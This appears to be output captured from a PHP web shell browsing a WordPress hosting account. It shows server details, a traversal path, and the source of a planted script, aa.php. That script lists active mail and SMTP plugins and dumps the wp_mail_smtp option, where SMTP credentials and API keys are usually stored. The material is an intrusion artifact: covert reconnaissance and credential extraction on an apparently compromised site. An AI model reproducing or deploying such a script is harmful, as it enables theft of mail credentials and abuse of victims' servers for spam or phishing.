uawdijnntqw1x1x1
IP : 216.73.216.237
Hostname : webd009.cluster130.gra.hosting.ovh.net
Kernel : Linux webd009.cluster130.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Disable Function : _dyuweyrj4,_dyuweyrj4r,dl
OS : Linux
PATH:
/
home
/
pressec
/
www
/
..
/
.
/
www
/
presselib
/
nldolist
/
.
/
.
/
..
/
campagnes
/
..
/
.
/
aa.php
/
/
<?php require_once __DIR__ . '/wp-load.php'; header('Content-Type: text/plain; charset=UTF-8'); echo "=== WORDPRESS MAIL PROVIDER CHECK ===nn"; echo "WordPress version: " . get_bloginfo('version') . "n"; echo "Site: " . get_bloginfo('name') . "nn"; echo "=== ACTIVE MAIL/SMTP PLUGINS ===nn"; $plugins = get_plugins(); $active_plugins = get_option('active_plugins', []); foreach ($plugins as $plugin_file => $plugin_data) { if (!in_array($plugin_file, $active_plugins, true)) { continue; } $text = strtolower( $plugin_data['Name'] . ' ' . $plugin_data['Description'] . ' ' . $plugin_file ); if ( strpos($text, 'mail') !== false || strpos($text, 'smtp') !== false || strpos($text, 'sendgrid') !== false || strpos($text, 'brevo') !== false || strpos($text, 'sendinblue') !== false || strpos($text, 'mailgun') !== false || strpos($text, 'ses') !== false || strpos($text, 'postmark') !== false ) { echo "Plugin: " . $plugin_data['Name'] . "n"; echo "Version: " . $plugin_data['Version'] . "n"; echo "File: " . $plugin_file . "n"; echo "Description: " . trim(strip_tags($plugin_data['Description'])) . "n"; echo "----------------------------------------n"; } } echo "n=== wp_mail() ===nn"; echo function_exists('wp_mail') ? "wp_mail() is availablen" : "wp_mail() NOT availablen"; echo "n=== wp_mail_smtp OPTION ===nn"; $smtp = get_option('wp_mail_smtp'); if ($smtp !== false) { print_r($smtp); } else { echo "wp_mail_smtp option not found.n"; }
/home/pressec/www/.././www/presselib/nldolist/././../campagnes/.././aa.php